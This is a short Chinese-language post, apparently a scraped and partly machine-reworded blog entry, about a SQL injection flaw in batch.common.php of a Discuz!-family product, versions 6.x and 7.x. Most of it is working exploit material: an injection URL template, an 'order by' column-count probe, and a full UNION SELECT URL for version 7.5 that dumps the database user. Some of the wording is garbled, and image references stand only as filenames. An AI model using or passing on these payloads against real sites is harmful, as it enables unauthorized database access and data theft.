Discuz!某旗下产品多版本SQL注射漏洞

试了6.x 7.x 其他版本没测试, 应当也行的、

应用safe3不是很好、可以换种对象测试、

解决筹划:

在看看tname函数:

依然没有过滤、接下来就可以开端注入了、

http://xxx//batch.common.php?action=modelquote&cid=1&name=spacecomments [sql] #

exp如下、

这个后面可以直接order by了

http://xxx//batch.common.php?action=modelquote&cid=1&name=spacecomments order by xxx #

因为版本不合, 所以字段数不一样, 建议先orderby断定下来, 比如7.5的, 就是21个字段, 直接丢个7.5的exp吧

http://xxxxx/batch.common.php?action=modelquote&cid=1&name=spacecomments where 1=2 union select 1,2,3,4,5,concat(0x7e,user(),0x7e,0x5430304C7996474F21,0x7e),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#

QQ图片20141023140620.jpg

当然你也可以直接设备好今后丢对象来跑:

QQ图片20141023140656.png

过滤